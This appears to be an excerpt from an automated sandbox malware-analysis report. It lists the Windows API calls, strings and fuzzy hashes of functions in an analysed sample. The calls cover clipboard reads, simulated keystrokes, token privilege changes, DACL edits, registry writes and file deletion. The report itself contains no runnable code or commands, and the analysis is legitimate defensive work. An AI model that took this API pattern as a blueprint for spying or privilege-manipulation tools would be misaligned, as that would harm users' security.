              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: AllocVirtual
              • String ID:
              • API String ID: 4275171209-0
              • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
              • Instruction ID: d8b9acea0358616f9987f0088c5e3f4867fff100f165acc3fc91cd413a3bf178
              • Instruction Fuzzy Hash: 8031E578A00105DFCB1ADF58D480969F7A6FF5E300B658AA9E409DB651D731EEC1DBC0
              APIs
              • Sleep.KERNELBASE(000001F4), ref: 01402311
              Memory Dump Source
              • Source File: 00000000.00000002.2016453985.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1400000_F2024-202202.jbxd
              Similarity
              • API ID: Sleep
              • String ID:
              • API String ID: 3472027048-0
              • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
              • Instruction ID: 5fe101c89807b51601d989c14cbcc7e238695cc33819a8b47cf5721a636143f3
              • Instruction Fuzzy Hash: 52E09A7494010DAFDB01EFB4D6496AE7BB4EF04301F1005A1FD0596691DA709A548A62
              APIs
              • Sleep.KERNELBASE(000001F4), ref: 01402311
              Memory Dump Source
              • Source File: 00000000.00000002.2016453985.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1400000_F2024-202202.jbxd
              Similarity
              • API ID: Sleep
              • String ID:
              • API String ID: 3472027048-0
              • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
              • Instruction ID: 8fe94f9e5b7b06b4581dafd121ffb8c768041325b27c2a8bcdf614575d728e3b
              • Instruction Fuzzy Hash: 28E0E67494010DDFDB00EFB4D64D6AE7FB4EF04301F100561FD01D2281D6709D508A62
              APIs
                • Part of subcall function 00182612: GetWindowLongW.USER32(?,000000EB), ref: 00182623
              • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0020CE50
              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0020CE91
              • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0020CED6
              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0020CF00
              • SendMessageW.USER32 ref: 0020CF29
              • _wcsncpy.LIBCMT ref: 0020CFA1
              • GetKeyState.USER32(00000011), ref: 0020CFC2
              • GetKeyState.USER32(00000009), ref: 0020CFCF
              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0020CFE5
              • GetKeyState.USER32(00000010), ref: 0020CFEF
              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0020D018
              • SendMessageW.USER32 ref: 0020D03F
              • SendMessageW.USER32(?,00001030,?,0020B602), ref: 0020D145
              • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0020D15B
              • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0020D16E
              • SetCapture.USER32(?), ref: 0020D177
              • ClientToScreen.USER32(?,?), ref: 0020D1DC
              • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0020D1E9
              • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0020D203
              • ReleaseCapture.USER32 ref: 0020D20E
              • GetCursorPos.USER32(?), ref: 0020D248
              • ScreenToClient.USER32(?,?), ref: 0020D255
              • SendMessageW.USER32(?,00001012,00000000,?), ref: 0020D2B1
              • SendMessageW.USER32 ref: 0020D2DF
              • SendMessageW.USER32(?,00001111,00000000,?), ref: 0020D31C
              • SendMessageW.USER32 ref: 0020D34B
              • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0020D36C
              • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0020D37B
              • GetCursorPos.USER32(?), ref: 0020D39B
              • ScreenToClient.USER32(?,?), ref: 0020D3A8
              • GetParent.USER32(?), ref: 0020D3C8
              • SendMessageW.USER32(?,00001012,00000000,?), ref: 0020D431
              • SendMessageW.USER32 ref: 0020D462
              • ClientToScreen.USER32(?,?), ref: 0020D4C0
              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0020D4F0
              • SendMessageW.USER32(?,00001111,00000000,?), ref: 0020D51A
              • SendMessageW.USER32 ref: 0020D53D
              • ClientToScreen.USER32(?,?), ref: 0020D58F
              • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0020D5C3
                • Part of subcall function 001825DB: GetWindowLongW.USER32(?,000000EB), ref: 001825EC
              • GetWindowLongW.USER32(?,000000F0), ref: 0020D65F
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
              • String ID: @GUI_DRAGID$F$pr$
              • API String ID: 3977979337-1957301577
              • Opcode ID: 4125b8e0d9e23c8aa8e1faed0573c6bacb20dbe91e63aa636997c18abe31dd84
              • Instruction ID: c63cc3c75e13e6bc90b799529076466da0fa0dd83fefb4b8cc967b686bf506f0
              • Instruction Fuzzy Hash: 9342DE74214342AFC725CF68D848EAABBE5FF49314F24061DF695876E2C7319864CF92
              APIs
              • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0020873F
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: MessageSend
              • String ID: %d/%02d/%02d
              • API String ID: 3850602802-328681919
              • Opcode ID: a4ee02c6d89e7b9f014eb6afcf34a38611928e26db8ef44e0fd1f5abc739c990
              • Instruction ID: b17735ed170f7171a2f2e22e3a7b02ad557e0fcfbd6fb98c3955f817259d5553
              • Instruction Fuzzy Hash: 2012CE71950305AFEB258F24DD49FABBBB8EF49310F204129F955EA2E2DFB08951CB10
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: _memmove$_memset
              • String ID: 0w#$DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
              • API String ID: 1357608183-1356228311
              • Opcode ID: d79c05a9716582113d7ee31a527c78c2c6e750ac87e6e5d4dd7a923b0fd29b9a
              • Instruction ID: d06fe32a5a5e8b75cc1315a7e54fcd0b440acc90f64a460db54d152fb63c978d
              • Instruction Fuzzy Hash: EF939F75A00219DBDF28CF98D881BADB7B1FF58710F25816BE955AB380E7709E81CB50
              APIs
              • GetForegroundWindow.USER32(00000000,?), ref: 00184A3D
              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 001BDA8E
              • IsIconic.USER32(?), ref: 001BDA97
              • ShowWindow.USER32(?,00000009), ref: 001BDAA4
              • SetForegroundWindow.USER32(?), ref: 001BDAAE
              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 001BDAC4
              • GetCurrentThreadId.KERNEL32 ref: 001BDACB
              • GetWindowThreadProcessId.USER32(?,00000000), ref: 001BDAD7
              • AttachThreadInput.USER32(?,00000000,00000001), ref: 001BDAE8
              • AttachThreadInput.USER32(?,00000000,00000001), ref: 001BDAF0
              • AttachThreadInput.USER32(00000000,?,00000001), ref: 001BDAF8
              • SetForegroundWindow.USER32(?), ref: 001BDAFB
              • MapVirtualKeyW.USER32(00000012,00000000), ref: 001BDB10
              • keybd_event.USER32(00000012,00000000), ref: 001BDB1B
              • MapVirtualKeyW.USER32(00000012,00000000), ref: 001BDB25
              • keybd_event.USER32(00000012,00000000), ref: 001BDB2A
              • MapVirtualKeyW.USER32(00000012,00000000), ref: 001BDB33
              • keybd_event.USER32(00000012,00000000), ref: 001BDB38
              • MapVirtualKeyW.USER32(00000012,00000000), ref: 001BDB42
              • keybd_event.USER32(00000012,00000000), ref: 001BDB47
              • SetForegroundWindow.USER32(?), ref: 001BDB4A
              • AttachThreadInput.USER32(?,?,00000000), ref: 001BDB71
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
              • String ID: Shell_TrayWnd
              • API String ID: 4125248594-2988720461
              • Opcode ID: 35298e21574ab09bd5bee3bced8468e3754987f8155debca664d5fc98e67cfcc
              • Instruction ID: 2571f9937ae29ada5031aba0a653faed753f673294e77291d08f95af6d264b23
              • Instruction Fuzzy Hash: F7317371A80318BFEB356F61AD49FBE7E6CEB44B50F114025FA04EB1D1DBB15900ABA1
              APIs
                • Part of subcall function 001D8CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 001D8D0D
                • Part of subcall function 001D8CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 001D8D3A
                • Part of subcall function 001D8CC3: GetLastError.KERNEL32 ref: 001D8D47
              • _memset.LIBCMT ref: 001D889B
              • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 001D88ED
              • CloseHandle.KERNEL32(?), ref: 001D88FE
              • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 001D8915
              • GetProcessWindowStation.USER32 ref: 001D892E
              • SetProcessWindowStation.USER32(00000000), ref: 001D8938
              • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 001D8952
                • Part of subcall function 001D8713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,001D8851), ref: 001D8728
                • Part of subcall function 001D8713: CloseHandle.KERNEL32(?,?,001D8851), ref: 001D873A
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
              • String ID: $default$winsta0
              • API String ID: 2063423040-1027155976
              • Opcode ID: ad18a16231f98aa3134f8e3b35fa12a48fc2be58722af39d671f8a06dab8fd38
              • Instruction ID: c0a3fe6f838b0f393895246addb33d0341efbf161483b139a5cfb90e7e0180d4
              • Instruction Fuzzy Hash: B3816D71950209BFDF21DFA4DD49AEEBBB8EF04304F08416AF910A7261DB758E54DB60
              APIs
              • OpenClipboard.USER32(0020F910), ref: 001F4284
              • IsClipboardFormatAvailable.USER32(0000000D), ref: 001F4292
              • GetClipboardData.USER32(0000000D), ref: 001F429A
              • CloseClipboard.USER32 ref: 001F42A6
              • GlobalLock.KERNEL32(00000000), ref: 001F42C2
              • CloseClipboard.USER32 ref: 001F42CC
              • GlobalUnlock.KERNEL32(00000000,00000000), ref: 001F42E1
              • IsClipboardFormatAvailable.USER32(00000001), ref: 001F42EE
              • GetClipboardData.USER32(00000001), ref: 001F42F6
              • GlobalLock.KERNEL32(00000000), ref: 001F4303
              • GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 001F4337
              • CloseClipboard.USER32 ref: 001F4447
              Similarity
              • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
              • String ID:
              • API String ID: 3222323430-0
              • Opcode ID: 032401656624e722ab7a2567f111ce5bb188c54c0f4e422e52a65c04afbf9a17
              • Instruction ID: 2340e73c70eea97cd6dd30e6feccef2e8ca95351554a49b8cf99e3ac6799d76a
              • Opcode Fuzzy Hash: 032401656624e722ab7a2567f111ce5bb188c54c0f4e422e52a65c04afbf9a17
              • Instruction Fuzzy Hash: 6251AD35244305ABD321FF60ED8AF7F77A8AF94B00F100529FA56D22A2DB70D9058B62
              APIs
              • FindFirstFileW.KERNEL32(?,?), ref: 001EC9F8
              • FindClose.KERNEL32(00000000), ref: 001ECA4C
              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 001ECA71
              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 001ECA88
              • FileTimeToSystemTime.KERNEL32(?,?), ref: 001ECAAF
              • __swprintf.LIBCMT ref: 001ECAFB
              • __swprintf.LIBCMT ref: 001ECB3E
                • Part of subcall function 00187F41: _memmove.LIBCMT ref: 00187F82
              • __swprintf.LIBCMT ref: 001ECB92
                • Part of subcall function 001A38D8: __woutput_l.LIBCMT ref: 001A3931
              • __swprintf.LIBCMT ref: 001ECBE0
                • Part of subcall function 001A38D8: __flsbuf.LIBCMT ref: 001A3953
                • Part of subcall function 001A38D8: __flsbuf.LIBCMT ref: 001A396B
              • __swprintf.LIBCMT ref: 001ECC2F
              • __swprintf.LIBCMT ref: 001ECC7E
              • __swprintf.LIBCMT ref: 001ECCCD
              Strings
              Similarity
              • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
              • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
              • API String ID: 3953360268-2428617273
              • Opcode ID: 70b3d1446f077595974d5c929a7dc467aaf4189d3a561fb49d510a3e89795594
              • Instruction ID: fcaca898dcc05816584f07ed471a46f27631b9775b6970728365181f581a2e03
              • Opcode Fuzzy Hash: 70b3d1446f077595974d5c929a7dc467aaf4189d3a561fb49d510a3e89795594
              • Instruction Fuzzy Hash: 0BA12BB1508344ABC714FBA4CD85DAFB7ECFFA4704F444929B59683191EB34DA09CB62
              APIs
              • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 001EF221
              • _wcscmp.LIBCMT ref: 001EF236
              • _wcscmp.LIBCMT ref: 001EF24D
              • GetFileAttributesW.KERNEL32(?), ref: 001EF25F
              • SetFileAttributesW.KERNEL32(?,?), ref: 001EF279
              • FindNextFileW.KERNEL32(00000000,?), ref: 001EF291
              • FindClose.KERNEL32(00000000), ref: 001EF29C
              • FindFirstFileW.KERNEL32(*.*,?), ref: 001EF2B8
              • _wcscmp.LIBCMT ref: 001EF2DF
              • _wcscmp.LIBCMT ref: 001EF2F6
              • SetCurrentDirectoryW.KERNEL32(?), ref: 001EF308
              • SetCurrentDirectoryW.KERNEL32(0023A5A0), ref: 001EF326
              • FindNextFileW.KERNEL32(00000000,00000010), ref: 001EF330
              • FindClose.KERNEL32(00000000), ref: 001EF33D
              • FindClose.KERNEL32(00000000), ref: 001EF34F
              Strings
              Similarity
              • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
              • String ID: *.*
              • API String ID: 1803514871-438819550
              • Opcode ID: c7ab0ec1bb831a749da74a8c8b59efa46fd40a275365f40e6c668d8d8c7376f0
              • Instruction ID: 6728d73a74e0f0f673c9a6268565818a93e7055173e767e87dd7c84cddfe7631
              • Opcode Fuzzy Hash: c7ab0ec1bb831a749da74a8c8b59efa46fd40a275365f40e6c668d8d8c7376f0
              • Instruction Fuzzy Hash: 5F31E67A5406596EDB20DBB5EC4CADE73ACAF09360F10017AFD14D3091EB30DA46CA50
              APIs
              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00200BDE
              • RegCreateKeyExW.ADVAPI32(?,?,00000000,0020F910,00000000,?,00000000,?,?), ref: 00200C4C
              • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00200C94
              • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00200D1D
              • RegCloseKey.ADVAPI32(?), ref: 0020103D
              • RegCloseKey.ADVAPI32(00000000), ref: 0020104A
              Strings
              Similarity
              • API ID: Close$ConnectCreateRegistryValue
              • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
              • API String ID: 536824911-966354055
              • Opcode ID: f6612ed210845c146097693add6fa6691d172ced17deca20f6af198237438612
              • Instruction ID: aa2d508bee08013c6a38c8c83fe71fd786be7f3b0aa07d8ed49513e7528801c3
              • Opcode Fuzzy Hash: f6612ed210845c146097693add6fa6691d172ced17deca20f6af198237438612
              • Instruction Fuzzy Hash: E90248756107129FDB14EF24C895E2AB7E5FF89714F04885DF88A9B2A2CB30ED51CB81
              APIs
              • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 001EF37E
              • _wcscmp.LIBCMT ref: 001EF393
              • _wcscmp.LIBCMT ref: 001EF3AA
                • Part of subcall function 001E45C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 001E45DC
              • FindNextFileW.KERNEL32(00000000,?), ref: 001EF3D9
              • FindClose.KERNEL32(00000000), ref: 001EF3E4
              • FindFirstFileW.KERNEL32(*.*,?), ref: 001EF400
              • _wcscmp.LIBCMT ref: 001EF427
              • _wcscmp.LIBCMT ref: 001EF43E
              • SetCurrentDirectoryW.KERNEL32(?), ref: 001EF450
              • SetCurrentDirectoryW.KERNEL32(0023A5A0), ref: 001EF46E
              • FindNextFileW.KERNEL32(00000000,00000010), ref: 001EF478
              • FindClose.KERNEL32(00000000), ref: 001EF485
              • FindClose.KERNEL32(00000000), ref: 001EF497
              Strings
              Similarity
              • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
              • String ID: *.*
              • API String ID: 1824444939-438819550
              • Opcode ID: 1bcd8bb62346114c3a890bed189eb9300c478b44b2b970725dd75ef080ef77a8
              • Instruction ID: 9f1850470fc302e054377b7298297bd849dc642dad7721e07f86ebc596ffdb8b
              • Opcode Fuzzy Hash: 1bcd8bb62346114c3a890bed189eb9300c478b44b2b970725dd75ef080ef77a8
              • Instruction Fuzzy Hash: A231F8725016996FCB21AFA5EC88ADE77ACAF49324F100179FC50E30E1E730DE46CA54
              APIs
                • Part of subcall function 001D874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 001D8766
                • Part of subcall function 001D874A: GetLastError.KERNEL32(?,001D822A,?,?,?), ref: 001D8770
                • Part of subcall function 001D874A: GetProcessHeap.KERNEL32(00000008,?,?,001D822A,?,?,?), ref: 001D877F
                • Part of subcall function 001D874A: HeapAlloc.KERNEL32(00000000,?,001D822A,?,?,?), ref: 001D8786
                • Part of subcall function 001D874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 001D879D
                • Part of subcall function 001D87E7: GetProcessHeap.KERNEL32(00000008,001D8240,00000000,00000000,?,001D8240,?), ref: 001D87F3
                • Part of subcall function 001D87E7: HeapAlloc.KERNEL32(00000000,?,001D8240,?), ref: 001D87FA
                • Part of subcall function 001D87E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,001D8240,?), ref: 001D880B
              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 001D825B
              • _memset.LIBCMT ref: 001D8270
              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 001D828F
              • GetLengthSid.ADVAPI32(?), ref: 001D82A0
              • GetAce.ADVAPI32(?,00000000,?), ref: 001D82DD
              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 001D82F9
              • GetLengthSid.ADVAPI32(?), ref: 001D8316
              • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 001D8325
              • HeapAlloc.KERNEL32(00000000), ref: 001D832C
              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 001D834D
              • CopySid.ADVAPI32(00000000), ref: 001D8354
              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 001D8385
              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 001D83AB
              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 001D83BF
              Similarity
              • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
              • String ID:
              • API String ID: 3996160137-0
              • Opcode ID: 8fa4a4a9edc812fc7f29bbfa8473e941bf9706bf016805b3ab86ea658c5cae5f
              • Instruction ID: 13f4803bc5333799351d6948ef2294def24c12865ddbbf5cff87a2269dbebce3
              • Opcode Fuzzy Hash: 8fa4a4a9edc812fc7f29bbfa8473e941bf9706bf016805b3ab86ea658c5cae5f
              • Instruction Fuzzy Hash: A1614771900209BBDF10DFA5DD88AAEBBB9FF04710F14816AF919A7291DB31DA15CB60
              Strings
              Similarity
              • API ID:
              • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$PJ"$UCP)$UTF)$UTF16)
              • API String ID: 0-3652197027
              • Opcode ID: fd2fb56e9da62f0edf3252be174633ef2eea34d0c0e7b8019de1100b49ff07ea
              • Instruction ID: 53c4d8fdf91a7ee789bf5f5cbb431412d957cac778533f9245140ea0fad462ed
              • Opcode Fuzzy Hash: fd2fb56e9da62f0edf3252be174633ef2eea34d0c0e7b8019de1100b49ff07ea
              • Instruction Fuzzy Hash: 63726175E00219ABDF28CF98C8907AEB7B5FF58310F15816AE959EB390D7709E41CB90
              APIs
                • Part of subcall function 002010A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00200038,?,?), ref: 002010BC
              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00200737
                • Part of subcall function 00189997: __itow.LIBCMT ref: 001899C2
                • Part of subcall function 00189997: __swprintf.LIBCMT ref: 00189A0C
              • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 002007D6
              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 0020086E
              • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00200AAD
              • RegCloseKey.ADVAPI32(00000000), ref: 00200ABA
              Similarity
              • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
              • String ID:
              • API String ID: 1240663315-0
              • Opcode ID: c04ed9adff6e10b959d629ed1bbe1481610745c10ebdbd3460596f4db9280b42
              • Instruction ID: 1d3220ff7ab7ce314bc88d31e52d80502f7d4d8c6603c4ed89179b5bed32a9b7
              • Opcode Fuzzy Hash: c04ed9adff6e10b959d629ed1bbe1481610745c10ebdbd3460596f4db9280b42
              • Instruction Fuzzy Hash: EAE15C31614311AFDB14DF28C885E2ABBE5EF89714F04896DF48ADB2A2DB30ED11CB51
              APIs
              • GetKeyboardState.USER32(?), ref: 001E0241
              • GetAsyncKeyState.USER32(000000A0), ref: 001E02C2
              • GetKeyState.USER32(000000A0), ref: 001E02DD
              • GetAsyncKeyState.USER32(000000A1), ref: 001E02F7
              • GetKeyState.USER32(000000A1), ref: 001E030C
              • GetAsyncKeyState.USER32(00000011), ref: 001E0324
              • GetKeyState.USER32(00000011), ref: 001E0336
              • GetAsyncKeyState.USER32(00000012), ref: 001E034E
              • GetKeyState.USER32(00000012), ref: 001E0360
              • GetAsyncKeyState.USER32(0000005B), ref: 001E0378
              • GetKeyState.USER32(0000005B), ref: 001E038A
              Similarity
              • API ID: State$Async$Keyboard
              • String ID:
              • API String ID: 541375521-0
              • Opcode ID: 9c07de8ae21ac4952f5f4b5d8bfa9d67ac3e95e9678222da49cc066661f4846f
              • Instruction ID: bc13ff33c45f1e07f305ca422d9381a3fb855c25c695acb833e450b7e3e72bf3
              • Opcode Fuzzy Hash: 9c07de8ae21ac4952f5f4b5d8bfa9d67ac3e95e9678222da49cc066661f4846f
              • Instruction Fuzzy Hash: 2841C924904FCA6EFF738A6598083ADBEE0BF19340F48409DD6C6465C3E7E459C887A2
              APIs
              Similarity
              • API ID: Clipboard$AllocCloseEmptyGlobalOpen
              • String ID:
              • API String ID: 1737998785-0
              • Opcode ID: 1c5559de866383784d60f9a18d381cae7a68b215ad4a29f859cbbf5037c04302
              • Instruction ID: af3399d9875f8bdb7ad948330d2e539f94b07613a897794bf567a822d3f308d3
              • Opcode Fuzzy Hash: 1c5559de866383784d60f9a18d381cae7a68b215ad4a29f859cbbf5037c04302
              • Instruction Fuzzy Hash: 3221BF35240224AFDB20AF60ED4DB7E77A8EF14310F14802AF946DB2B2DB71AD00CB84
              APIs
                • Part of subcall function 001848AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,001848A1,?,?,001837C0,?), ref: 001848CE
                • Part of subcall function 001E4CD3: GetFileAttributesW.KERNEL32(?,001E3947), ref: 001E4CD4
              • FindFirstFileW.KERNEL32(?,?), ref: 001E3ADF
              • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 001E3B87
              • MoveFileW.KERNEL32(?,?), ref: 001E3B9A
              • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 001E3BB7
              • FindNextFileW.KERNEL32(00000000,00000010), ref: 001E3BD9
              • FindClose.KERNEL32(00000000,?,?,?,?), ref: 001E3BF5
              Strings
              Similarity
              • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
              • String ID: \*.*
              • API String ID: 4002782344-1173974218
              • Opcode ID: 7809b21d0ccea170730f0297e84457a45f58967b92dadec400eca9e39d39b363
              • Instruction ID: d2c1e52442d594b50a4139a15a695307ec24d04eb8077f9a79671981a30568d4
              • Opcode Fuzzy Hash: 7809b21d0ccea170730f0297e84457a45f58967b92dadec400eca9e39d39b363
              • Instruction Fuzzy Hash: 765183318016899BCF15FBA1DE968EDB7B9AF64300F6441A5E45277092EF31AF09CF60
              APIs
                • Part of subcall function 00187F41: _memmove.LIBCMT ref: 00187F82
              • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 001EF6AB
              • Sleep.KERNEL32(0000000A), ref: 001EF6DB
              • _wcscmp.LIBCMT ref: 001EF6EF
              • _wcscmp.LIBCMT ref: 001EF70A
              • FindNextFileW.KERNEL32(?,?), ref: 001EF7A8
              • FindClose.KERNEL32(00000000), ref: 001EF7BE
              Strings
              Similarity
              • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
              • String ID: *.*
              • API String ID: 713712311-438819550
              • Opcode ID: d3c801316e02744eb49f9923486069b8b672857b46169af68eacc1c36d388056
              • Instruction ID: 097b3ab4eb04b244626270a2963658f52b7d99f3681fa33d35f5ef0eee459740
              • Opcode Fuzzy Hash: d3c801316e02744eb49f9923486069b8b672857b46169af68eacc1c36d388056
